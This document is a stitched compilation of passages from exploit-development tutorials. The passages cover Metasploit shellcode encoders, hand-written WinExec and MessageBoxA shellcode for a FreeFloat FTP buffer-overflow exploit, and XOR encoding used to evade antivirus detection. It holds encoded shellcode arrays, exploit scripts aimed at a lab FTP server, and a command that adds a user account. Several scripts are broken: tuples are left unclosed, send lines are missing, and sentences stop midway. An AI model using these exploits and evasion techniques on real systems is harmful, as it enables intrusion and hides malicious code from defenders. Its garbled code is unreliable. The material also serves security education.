first instruction of the decoder, which defines where the loop needs to jump back to. That
explains why the loop instruction itself was not part of the decoder instructions (the decoder
needed to determine its own address before it could write the LOOPD instruction), but had to
be recombined by the first XOR operation.
From that point forward, a loop is initiated and results are written to EBX+15 (and EBX is
increased by 4 on each iteration). So the first time the loop is executed, after EBX is increased
by 4, EBX+15 points just below the LOOPD instruction (so the decoder can use EBX+15 to keep
track of the location where to write the decoded/original shellcode). As shown above, the
decoding loop consists of the following instructions :
ADD EBX,4
The ECX register is used to keep track of the position in the shellcode (it counts down). When
ECX reaches 1, the original shellcode has been reproduced below the loop, so the jump (LOOPD)
will not be taken anymore, and the original code will get executed (because it is located
directly after the loop).
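To make the XOR + ADD feedback more tangible, here is a small Python model of the two loop instructions, applied to the first three encoded dwords that follow the decoder in the output above (the 12 bytes starting with \x81\xf2\x69\x34). It is a sketch for this particular output only: other shikata_ga_nai runs use different registers, keys and operation order, and `xor_additive_decode` is a name invented for the example.

```python
import struct

MASK = 0xFFFFFFFF


def xor_additive_decode(encoded: bytes, key: int) -> bytes:
    """Model of the decoding loop: XOR with the key, then add the result to it."""
    decoded = bytearray()
    for (cipher,) in struct.iter_unpack("<I", encoded):
        plain = cipher ^ key          # XOR DWORD PTR DS:[EBX+15],EDI
        key = (key + plain) & MASK    # ADD EDI,DWORD PTR DS:[EBX+15]
        decoded += struct.pack("<I", plain)
    return bytes(decoded)


# First three encoded dwords after the decoder, taken from the output above.
encoded = bytes.fromhex("81f26934" "249369ac" "e5041849")
decoded = xor_additive_decode(encoded, 0x58010763)

print(decoded[:2].hex())   # the recombined LOOPD instruction
print(decoded[2:].hex())   # first bytes of the original shellcode
```

The first two decoded bytes are the LOOPD instruction (E2 F5), and the bytes after it match the start of the original msgbox shellcode (\x68\x6c\x61\x6e\x00\x68...). Because the key changes with every decoded dword, two identical input dwords do not produce identical encoded dwords.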
We know where the XOR and Additive words come from… but what about Polymorphic ?
Well, every time you run the encoder, some things change
• the place of the instructions to get the address of the start of the decoder changes
• the registers used to keep track of the position (EBX in our example above, EDX in the
screenshot below) vary.
In essence, the order of the instructions before the loop changes, and the variable values
(registers, value of ESI) change too.
This makes sure that, every time you create an encoded version of the payload, most of the
bytes will be different (without changing the overall concept behind the decoder), which
makes this payload “polymorphic” / hard to detect.
x86/alpha_mixed
Encoding our example msgbox shellcode with this encoder produces a 218 byte encoded
shellcode :
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";
As you can see in this output, the biggest part of the shellcode consists of alphanumeric
characters (we just have a couple of non-alphanumeric characters at the beginning of the code).
The main concept behind this encoder is to reproduce the original code (via a loop), by
performing certain operations on these alphanumeric characters – pretty much like what
shikata_ga_nai does, but using a different (limited) instruction set and different operations.
x86/fnstenv_mov
Yet another encoder, but it will again produce something that has the same building blocks as
the other examples of encoded shellcode :
• reproduce the original code (one way or another – this technique is specific to each
encoder/decoder)
"\x6a\x33\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48"
"\x9d\xfb\x3b\x83\xeb\xfc\xe2\xf4\xb4\x75\x72\x3b\x48\x9d"
"\x9b\xb2\xad\xac\x29\x5f\xc3\xcf\xcb\xb0\x1a\x91\x70\x69"
"\x5c\x16\x89\x13\x47\x2a\xb1\x1d\x79\x62\xca\xfb\xe4\xa1"
"\x9a\x47\x4a\xb1\xdb\xfa\x87\x90\xfa\xfc\xaa\x6d\xa9\x6c"
"\xc3\xcf\xeb\xb0\x0a\xa1\xfa\xeb\xc3\xdd\x83\xbe\x88\xe9"
"\xb1\x3a\x98\xcd\x70\x73\x50\x16\xa3\x1b\x49\x4e\x18\x07"
"\x01\x16\xcf\xb0\x49\x4b\xca\xc4\x79\x5d\x57\xfa\x87\x90"
"\xfa\xfc\x70\x7d\x8e\xcf\x4b\xe0\x03\x00\x35\xb9\x8e\xd9"
"\x10\x16\xa3\x1f\x49\x4e\x9d\xb0\x44\xd6\x70\x63\x54\x9c"
"\x28\xb0\x4c\x16\xfa\xeb\xc1\xd9\xdf\x1f\x13\xc6\x9a\x62"
"\x12\xcc\x04\xdb\x10\xc2\xa1\xb0\x5a\x76\x7d\x66\x22\x9c"
"\x76\xbe\xf1\x9d\xfb\x3b\x18\xf5\xca\xb0\x27\x1a\x04\xee"
"\xf3\x6d\x4e\x99\x1e\xf5\x5d\xae\xf5\x00\x04\xee\x74\x9b"
"\x87\x31\xc8\x66\x1b\x4e\x4d\x26\xbc\x28\x3a\xf2\x91\x3b"
"\x1b\x62\x2e\x58\x29\xf1\x98\x15\x2d\xe5\x9e\x3b\x42\x9d"
"\xfb\x3b";
• FLDZ + FSTENV : code used to determine its own location in memory (pretty much the
same as what was used in shikata_ga_nai)
• XOR DWORD PTR DS:[EBX+13], 3BFB9D48 : XOR operation on the data at an address that
is relative (+13) to EBX. EBX was initialized in the previous instruction. This will produce
4 bytes of original shellcode. When this XOR operation is run for the first time, the
MOV AH,75 instruction (at 0x00402196) is changed to “CLD”
• SUB EBX, -4 : subtracting -4 adds 4 to EBX, so next time we will write the next 4 bytes
• LOOPD SHORT : decrement ECX and jump back to the XOR operation, as long as ECX is not
zero
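Unlike shikata_ga_nai, the key here never changes, so the loop is a plain dword-wise XOR. The Python sketch below applies the key 3BFB9D48 to the first three encoded dwords that follow the decoder in the output above (the bytes starting with \xb4\x75\x72\x3b). `xor_dwords` is a name chosen for this example only.

```python
import struct


def xor_dwords(data: bytes, key: int) -> bytes:
    """XOR every little-endian dword in data with a fixed 32-bit key."""
    out = bytearray()
    for (dword,) in struct.iter_unpack("<I", data):
        out += struct.pack("<I", dword ^ key)
    return bytes(out)


# First three encoded dwords after the 22-byte decoder in the output above.
encoded = bytes.fromhex("b475723b" "489d9bb2" "adac295f")
decoded = xor_dwords(encoded, 0x3BFB9D48)

print(decoded.hex())
```

The first decoded byte is FC (CLD), which is the change you see in the debugger after the first XOR, and it is followed by E8 89 00 00 00, the CALL mentioned below.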
The loop will effectively reproduce the shellcode. When ECX is zero (so when all code has
been reproduced), we can see code (which uses MOV operations + XOR to get our desired
values):
First, a call to 0x00402225 is made (main function of the shellcode), where we can see a
pointer to “calc.exe” getting pushed onto the stack, and WinExec being located and executed.
Don’t worry about how the shellcode works (“locating winexec, etc”) for now – you’ll learn all
about it in the next chapters.
Take the time to look at what the various encoders have produced and how the decoding
loops work. This knowledge may be essential if you need to tweak the code.
Skylined recently released the alpha3 encoding utility (an improved version of alpha2, which I
have discussed in the unicode tutorial). Alpha3 will produce 100% alphanumeric code, and
offers some other functionality that may come in handy when writing shellcode/building
exploits. Definitely worth checking out !
Little example : let’s assume you have written your unencoded shellcode into calc.bin, then
you can use this command to convert it to latin-1 compatible shellcode :
Reading calclatin.bin
"\xe8\xff\xff\xff\xff\xc3\x59\x68"
"\x66\x66\x66\x66\x6b\x34\x64\x69"
"\x46\x6b\x44\x71\x6c\x30\x32\x44"
"\x71\x6d\x30\x44\x31\x43\x75\x45"
"\x45\x35\x6c\x33\x4e\x33\x67\x33"
"\x7a\x32\x5a\x32\x77\x34\x53\x30"
"\x6e\x32\x4c\x31\x33\x34\x5a\x31"
"\x33\x34\x6c\x34\x47\x30\x63\x30"
"\x54\x33\x75\x30\x31\x33\x57\x30"
"\x71\x37\x6f\x35\x4f\x32\x7a\x32"
"\x45\x30\x63\x30\x6a\x33\x77\x30"
"\x32\x32\x77\x30\x6e\x33\x78\x30"
"\x36\x33\x4f\x30\x73\x30\x65\x30"
"\x6e\x34\x78\x33\x61\x37\x6f\x33"
"\x38\x34\x4f\x35\x4d\x30\x61\x30"
"\x67\x33\x56\x33\x49\x33\x6b\x33"
"\x61\x37\x6c\x32\x41\x30\x72\x32"
"\x41\x38\x6b\x33\x48\x30\x66\x32"
"\x41\x32\x43\x32\x43\x34\x48\x33"
"\x73\x31\x36\x32\x73\x30\x58\x32"
"\x70\x30\x6e\x31\x6b\x30\x61\x30"
"\x55\x32\x6b\x30\x55\x32\x6d\x30"
"\x53\x32\x6f\x30\x58\x37\x4b\x34"
"\x7a\x34\x47\x31\x36\x33\x36\x35"
"\x4b\x30\x76\x37\x6c\x32\x6e\x30"
"\x64\x37\x4b\x38\x4f\x34\x71\x30"
"\x68\x37\x6f\x30\x6b\x32\x6c\x31"
"\x6b\x30\x37\x38\x6b\x34\x49\x31"
"\x70\x30\x33\x33\x58\x35\x4f\x31"
"\x33\x34\x48\x30\x61\x34\x4d\x33"
"\x72\x32\x41\x34\x73\x31\x37\x32"
"\x77\x30\x6c\x35\x4b\x32\x43\x32"
"\x6e\x33\x5a\x30\x66\x30\x46\x30"
"\x4a\x30\x42\x33\x4e\x33\x53\x30"
"\x79\x30\x6b\x34\x7a\x30\x6c\x32"
"\x72\x30\x72\x33\x4b\x35\x4b\x31"
"\x35\x30\x39\x35\x4b\x30\x5a\x34"
"\x7a\x30\x6a\x33\x4e\x30\x50\x38"
"\x4f\x30\x64\x33\x62\x34\x57\x35"
"\x6c\x33\x41\x33\x62\x32\x79\x32"
"\x5a\x34\x52\x33\x6d\x30\x62\x30"
"\x31\x35\x6f\x33\x4e\x34\x7a\x38"
"\x4b\x34\x45\x38\x4b\x31\x4c\x30"
"\x4d\x32\x72\x37\x4b\x30\x43\x38"
"\x6b\x33\x50\x30\x6a\x30\x52\x30"
"\x36\x34\x47\x30\x54\x33\x75\x37"
"\x6c\x32\x4f\x35\x4c\x32\x71\x32"
"\x44\x30\x4e\x33\x4f\x33\x6a\x30"
"\x34\x33\x73\x30\x36\x34\x47\x34"
"\x79\x32\x4f\x32\x76\x30\x70\x30"
"\x50\x33\x38\x30\x30";
I could probably dedicate an entire document to using and writing encoders (which is out of
scope for now). You can, however, use this excellent uninformed paper, written by skape, on
how to implement a custom x86 encoder.
https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
Hello and welcome! Today we will be writing our own shellcode from scratch. This is a
particularly useful exercise for two reasons: (1) you may have an exploit that doesn't need to
be portable but has severe space restrictions and (2) it's a good way to get a grasp on ROP
(Return Oriented Programming). Even though there are some significant differences, ROP will
also involve crafting parameters to Windows API functions on the stack.
To speed things up we will be using the skeleton of the "FreeFloat FTP" exploit that we created
in part 1 of this tutorial series. You will also need a program called "arwin" which is a utility to
find the absolute addresses of windows functions within a specified DLL. I have included all the
relevant information below (the C source and a compiled version).
Introduction
I just want to say a couple of things before we get started. Firstly, the shellcode we will write
will be OS and build specific (in our case WinXP SP3). Secondly, this technique is only possible
because the OS DLLs in WinXP are not subject to base address randomization (ASLR). Thirdly,
Google + MSDN is your biggest friend. Finally, don't be discouraged, this is much easier than it
sounds.
We will be creating two separate "payloads", (1) launching calculator and (2) creating a
message-box popup. To do this we will be leveraging two windows API functions (1) WinExec
and (2) MessageBoxA.
But first let's have a look at what the shellcode looks like when it is generated by the metasploit
framework (take note of the size for later). Don't forget to encode the shellcode to filter out
bad characters.
"\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1"
"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf"
"\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93"
"\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1"
"\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3"
"\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6"
"\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc"
"\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f"
"\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c"
"\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12"
"\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40"
"\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f"
"\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78"
"\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5"
"\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92"
"\xb8\x7f";
(2) MessageBoxA: popup with the title set to "b33f" and the message set to "Pop the box!"
'\x00\x0A\x0D' -t c
"\xb8\xe0\x20\xa7\x98\xdb\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x42\x31\x42\x12\x83\xc2\x04\x03\xa2\x2e\x45\x6d\xfb\xc4\x12"
"\x57\x8f\x3e\xd1\x59\xbd\x8d\x6e\xab\x88\x96\x1b\xba\x3a\xdc"
"\x6a\x31\xb1\x94\x8e\xc2\x83\x50\x24\xaa\x2b\xea\x0c\x6b\x64"
"\xf4\x05\x78\x23\x05\x37\x81\x32\x65\x3c\x12\x90\x42\xc9\xae"
"\xe4\x01\x99\x18\x6c\x17\xc8\xd2\xc6\x0f\x87\xbf\xf6\x2e\x7c"
"\xdc\xc2\x79\x09\x17\xa1\x7b\xe3\x69\x4a\x4a\x3b\x75\x18\x29"
"\x7b\xf2\x67\xf3\xb3\xf6\x66\x34\xa0\xfd\x53\xc6\x13\xd6\xd6"
"\xd7\xd7\x7c\x3c\x19\x03\xe6\xb7\x15\x98\x6c\x9d\x39\x1f\x98"
"\xaa\x46\x94\x5f\x44\xcf\xee\x7b\x88\xb1\x2d\x31\xb8\x18\x66"
"\xbf\x5d\xd3\x44\xa8\x13\xaa\x46\xc5\x79\xdb\xc8\xea\x82\xe4"
"\x7e\x51\x78\xa0\xff\x82\x62\xa5\x78\x2e\x46\x18\x6f\xc1\x79"
"\x63\x90\x57\xc0\x94\x07\x04\xa6\x84\x96\xbc\x05\xf7\x36\x59"
"\x01\x82\x35\xc4\xa3\xe4\xe6\x22\x49\x7c\xf0\x7d\xb2\x2b\xf9"
"\x08\x8e\x84\xba\xa3\xac\x68\x01\x34\xac\x56\x2b\xd3\xad\x69"
"\x34\xdc\x45\xce\xeb\x03\xb5\x86\x89\x70\x86\x30\x7f\xac\x60"
"\xe0\x5b\x56\xf9\xfa\xcc\x0e\xd9\xdc\x2c\xc7\x7b\x72\x55\x36"
"\x13\xf8\xcd\x5d\xc3\x68\x5e\xf1\x73\x49\x6f\xc4\xfb\xc5\xab"
"\xda\x72\x34\x82\x30\xd6\xe4\xb4\xe6\x29\xda\x06\xc7\x85\x24"
"\x3d\xcf";
You can test these payloads later to confirm that they work as intended. Time to see if we can
live up to the metasploit framework and write our own shellcode!!
Skeleton Exploit
To make this tutorial as realistic as possible we are going to be implementing our payloads in
the "FreeFloat FTP" exploit that we made for part 1 of this tutorial series. The first step is to
generate our skeleton exploit, essentially we will be stripping down our previous exploit like
this.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
import socket
import sys
shellcode = (
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
# 0x77c35459 : push esp # ret | msvcrt.dll #
#----------------------------------------------------------------------------------#
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close()
This should give us a base to work with. Any shellcode we place in the shellcode variable will
be executed. As you can see in the screenshot below we reach our nopsled after stepping
through the instructions at EIP.
Nopsled
ASM && Opcode
When you write your own shellcode you will obviously have to deal with assembly and opcode
(the hex translation of your ASM). You will need some basic knowledge of assembly (push, pop,
mov, xor, etc.), nothing too dramatic. The main point here is that your shellcode will be written
in opcode, so you might ask yourself how to find the opcode for any given instruction. I'll tell
you the way I approach the problem.
If you put a breakpoint in the debugger, you can manually edit the instruction there and
immunity will provide you with the opcode. In a sense you are using immunity as a dictionary.
In the screenshots below you can see the opcode “translation” of several random instructions.
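For instructions that carry a 32-bit immediate you can also build the bytes yourself once you know the one-byte opcode, because the value is simply appended in little-endian order. The Python sketch below covers only the two encodings that appear in this document's listings (68 for PUSH imm32 and BB for MOV EBX,imm32); the helper names are invented for the example, and the debugger remains the easier dictionary for everything else.

```python
import struct


def push_imm32(value: int) -> bytes:
    """PUSH imm32: opcode 0x68 followed by the little-endian dword."""
    return b"\x68" + struct.pack("<I", value)


def mov_ebx_imm32(value: int) -> bytes:
    """MOV EBX,imm32: opcode 0xBB followed by the little-endian dword."""
    return b"\xBB" + struct.pack("<I", value)


# MOV EBX,7C862AED as used for the WinExec pointer in this section.
print(mov_ebx_imm32(0x7C862AED).hex())

# The "push esp # ret" address 0x77c35459 from the skeleton exploit,
# written the way it has to appear inside the buffer.
print(struct.pack("<I", 0x77C35459).hex())
```

Note how the address 7C862AED ends up as ED 2A 86 7C in the opcode: this byte reversal is the reason return addresses and pushed strings look "backwards" in exploit code.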
(1) WinExec
Before we can do anything we need to know what the WinExec function looks like and what
parameters we need to feed it. You can find that information on MSDN.
WinExec: MSDN
Take some time to read through the information, you will see that the WinExec function has a
very simple structure consisting of two parameters (lpCmdLine and uCmdShow); together with
the address of the function itself, that gives us three values to work out, as shown below.
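Structure:
UINT WINAPI WinExec(
  LPCSTR lpCmdLine,
  UINT uCmdShow
);
Parameters: lpCmdLine (pointer to the command line string), uCmdShow (display option)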
Let's take this one step at a time. The first thing we need to find is a pointer to WinExec;
arwin can help us here since kernel32.dll is non-ASLR in WinXP. Open arwin in a terminal on
the debugging machine and type the following.
Next we need to figure out how to write our ASCII string (in this case the command we want to
run) to the stack. When doing this for the first time it might seem a bit confusing but it's not
that difficult. The best way to understand is by looking at the following examples.
Example 1: calc.exe
Split the text into groups of 4 characters:
"calc"
".exe"
Reverse the order of the character groups:
".exe"
"calc"
Look on google for an ASCII to hex converter and convert each character while maintaining
the order:
"\x2E\x65\x78\x65"
"\x63\x61\x6C\x63"
Example 2: abcdefghijkl
Split the text into groups of 4 characters:
"abcd"
"efgh"
"ijkl"
Reverse the order of the character groups:
"ijkl"
"efgh"
"abcd"
Look on google for an ASCII to hex converter and convert each character while maintaining
the order:
"\x69\x6A\x6B\x6C"
"\x65\x66\x67\x68"
"\x61\x62\x63\x64"
To write these values to the stack, simply add "\x68" (the PUSH opcode) in front of each group.
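The split / reverse / convert steps above are mechanical, so they can be sketched in Python instead of using an online converter. `string_to_pushes` is a hypothetical helper written for this example; it pads with trailing spaces when the text is not a multiple of 4 characters, which is an assumption that only holds for command lines where trailing whitespace is harmless.

```python
def string_to_pushes(text: str, pad: str = " "):
    """Return the PUSH imm32 byte sequences that write text to the stack.

    The text is split into 4-character groups and the groups are emitted
    in reverse order, because the last group has to be pushed first.
    """
    data = text.encode("ascii")
    if len(data) % 4:
        data += pad.encode("ascii") * (4 - len(data) % 4)
    groups = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [b"\x68" + group for group in reversed(groups)]


for push in string_to_pushes("calc.exe"):
    escaped = "".join(f"\\x{byte:02X}" for byte in push)
    print(f'"{escaped}"  => PUSH "{push[1:].decode()}"')
```

The helper does not add the terminating null bytes; those still have to be pushed separately before the string.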
This seems pretty straightforward; however, you might have noticed that our ASCII text needs
to be 4-character aligned, so what happens when it is not? There are quite a few ways of
dealing with this; I suggest you read this excellent tutorial written by corelanc0d3r. As always,
mastery requires effort. I will however show you one technique; look at the example below.
ASCII Text:
"net "
"user"
" b33"
"f 12"
"34 /"
"add"
As you can see the alignment doesn't add up: we are left with 3 characters at the end. There is
an easy fix for this: adding an extra space at the end won't affect the command at all. After
reversing the group
Finally we need to push "1" to the stack. Remember, if you don’t know the opcode for an ASM
instruction you can type the command live in the debugger, which will translate it for you.
uCmdShow needs to be set to 0x00000001. There are a couple of ways you can do this, just use
your
(*) Just to give you an idea, something like this could also work:
We are going to put these arguments on the stack in the same order as shown on MSDN.
There are two things we need to remember: (1) the stack grows downward, so we need to push
the last argument first and (2) lpCmdLine contains our ASCII command, but WinExec doesn’t
want the ASCII string itself, it wants a pointer to the ASCII string.
"\x68\x2E\x65\x78\x65" => PUSH ".exe" \ Push The ASCII string to the stack
"\x8B\xC4" => MOV EAX,ESP | Put a pointer to the ASCII string in EAX
"\xBB\xED\x2A\x86\x7C" => MOV EBX,7C862AED | Move the pointer to WinExec() into EBX
This is a pretty good try but it won't work. Let's see what happens when we execute these
instructions in the debugger.
It's pretty close, but we can see that when WinExec is called our string has no terminator, so
WinExec doesn't know where our ASCII command ends and a ton of data is appended to
"calc.exe". We will need to terminate the ASCII string with null bytes.
We need "calc.exe" + "\x00"'s, but we know that null bytes are bad characters. However, we
can easily xor a register with itself (it will then contain 4 null bytes) and push it to the stack
just before we push “calc.exe”.
"\x50" => PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
"\x68\x2E\x65\x78\x65" => PUSH ".exe" \ Push The ASCII string to the stack
"\x68\x63\x61\x6C\x63" => PUSH "calc" /
"\x8B\xC4" => MOV EAX,ESP | Put a pointer to the ASCII string in EAX
"\x50" => PUSH EAX | Push the pointer to lpCmdLine to the stack
"\xBB\xED\x2A\x86\x7C" => MOV EBX,7C862AED | Move the pointer to WinExec() into EBX
That should do the trick! We can see from the screenshots below that the parameters are now
displayed correctly. If you execute this code you will see calculator opening up.
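If you want to convince yourself why the extra PUSH EAX matters without opening the debugger, the effect can be modelled in Python. This is a toy model, not an emulator: the `Stack` class and the 0x41 filler (standing in for whatever data already sits above ESP) are assumptions made for the illustration.

```python
class Stack:
    """Tiny model of a downward-growing stack filled with leftover data."""

    def __init__(self, size: int = 32, filler: int = 0x41):
        self.mem = bytearray([filler] * size)
        self.esp = size // 2          # the upper half models older stack data

    def push(self, dword: bytes) -> None:
        assert len(dword) == 4
        self.esp -= 4                 # the stack grows toward lower addresses
        self.mem[self.esp:self.esp + 4] = dword

    def cstring_at_esp(self) -> bytes:
        """Read bytes from ESP up to the first null, as a C string reader would."""
        end = self.mem.find(b"\x00", self.esp)
        if end == -1:
            return bytes(self.mem[self.esp:])
        return bytes(self.mem[self.esp:end])


def build(with_null_padding: bool) -> bytes:
    stack = Stack()
    if with_null_padding:
        stack.push(b"\x00\x00\x00\x00")   # PUSH EAX after zeroing EAX
    stack.push(b".exe")                   # PUSH ".exe"
    stack.push(b"calc")                   # PUSH "calc"
    return stack.cstring_at_esp()         # what MOV EAX,ESP would point at


print(build(with_null_padding=False))
print(build(with_null_padding=True))
```

Without the padding the string runs on into the leftover stack data, which is the "ton of data" seen in the debugger; with it, the string stops right after "calc.exe".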
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# (*) WinExec #
# #
# ); #
# #
#----------------------------------------------------------------------------------#
WinExec = (
"\x6A\x01" # PUSH 1
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + WinExec
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close()
(2) MessageBoxA
Before we do anything let's see what the MessageBoxA function looks like and what
parameters we need to feed it. You can find that information on MSDN.
MessageBoxA: MSDN
Structure:
int WINAPI MessageBoxA(
  HWND hWnd,
  LPCSTR lpText,
  LPCSTR lpCaption,
  UINT uType
);
Let's start with our pointer to MessageBoxA; this time we need to let arwin look in user32.dll.
Good, let's craft both our ASCII strings just like before. I have cheated a bit to make sure that
they are both 4-byte aligned but I encourage you to play around with it and create your own
caption and text.
Caption: b33f
Split the text into groups of 4 characters:
"b33f"
Reverse the order of the character groups:
"b33f"
Look on google for an ASCII to hex converter and convert each character while maintaining
the order:
"\x62\x33\x33\x66"
Text: Pop the box!
Split the text into groups of 4 characters:
"Pop "
"the "
"box!"
Reverse the order of the character groups:
"box!"
"the "
"Pop "
Look on google for an ASCII to hex converter and convert each character while maintaining
the order:
"\x62\x6F\x78\x21"
"\x74\x68\x65\x20"
"\x50\x6F\x70\x20"
To write these values to the stack, simply add "\x68" (the PUSH opcode) in front of each group.
The two other parameters that remain, hWnd and uType, need to be set to 0x00000000 which
is convenient since we will need to xor a register to pad our ASCII strings in any case. We can
then use that register to push null-bytes to the stack for these parameters as well.
This is the shellcode I came up with (but again, other variations are definitely possible).
"\x50" => PUSH EAX | Push EAX to have null-byte padding for "b33f"
"\x68\x62\x33\x33\x66" => PUSH "b33f" | Push The ASCII string to the stack
"\x50" => PUSH EAX | Push EAX to have null-byte padding for "Pop the box!"
"\x68\x74\x68\x65\x20" => PUSH "the " | Push The ASCII string to the stack
Like taking candy from a CPU hehe. In the screenshot below you can see the opcode in the
debugger and confirm that the parameters are displayed correctly.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 6 of my Exploit Development tutorial #
# series - http://www.fuzzysecurity.com/tutorials/expDev/6.html #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# (*) WinExec #
# #
# ); #
# #
#----------------------------------------------------------------------------------#
WinExec = (
"\x6A\x01" # PUSH 1
#----------------------------------------------------------------------------------#
# (*) MessageBoxA #
# #
# ); #
# #
#----------------------------------------------------------------------------------#
MessageBoxA = (
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close()
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://www.linkedin.com/pulse/shellcode-creation-binary-execution-through-execve-andrade-filho/
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
If you are not familiar, you use a shellcode encoder/decoder to hide the shellcode from AV
signature detection.
First, you place the encoded shellcode inside of the decoder application, and then the
application proceeds to decode the shellcode. Once the decoding is complete, the decoder
stub jumps to the shellcode, and it executes it.
While the shellcode is now harder to detect with signature detection, note that the decoder
stub itself could be detected.
XOR Encoding/Decoding
If you are unfamiliar with the XOR operator, it performs an exclusive OR: the result is 1 only
when the two input bits differ.
• A xor A = 0
• A xor NOT A = 1
• NOT A xor A = 1
In this case, we will use a property of XOR that makes it easily reversible.
• (A xor B) xor B = A
This means that we encode our original shellcode byte (A) with the encoding byte (B). Then,
during the decoder process, we just need to XOR the encoded byte with the encoder byte (B),
to get the original shellcode byte (A).
Here is a great image from mutti that breaks down the process.
To perform the encoding and decoding process, you do the following four steps (via SLAE):
1. Choose an encoder byte (0xAA in this case)
2. XOR every byte of the original shellcode with 0xAA to produce the encoded shellcode
3. Write a decoder stub that will XOR the encoded shellcode bytes with 0xAA (thereby
recovering the original shellcode)
4. Pass control from the decoder stub to the decoded shellcode
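The encoding side of these steps can be sketched in Python. The input below is the 25-byte execve (/bin/sh) shellcode that this post reuses, and `xor_bytes` is simply a name picked for the example; the original author may have used a different script.

```python
KEY = 0xAA


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with the same key; applying it twice restores the input."""
    return bytes(byte ^ key for byte in data)


# execve-stack shellcode (unencoded), 25 bytes.
original = bytes.fromhex("31c050682f2f7368682f62696e89e35089e25389e1b00bcd80")

encoded = xor_bytes(original)
print(",".join(f"0x{byte:02x}" for byte in encoded))

# (A xor B) xor B = A
assert xor_bytes(encoded) == original
```

The printed bytes are the ones that end up in the `Shellcode: db` line of the decoder below, before the end marker is appended.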
First, I'll start by just sharing my final application code. It is very well commented, but I'll also
explain it a bit further below.
As you can see, it uses the same JMP-CALL-POP technique as my Hello World shellcode.
The xor operation is fairly straightforward, and then the application loops through the decode
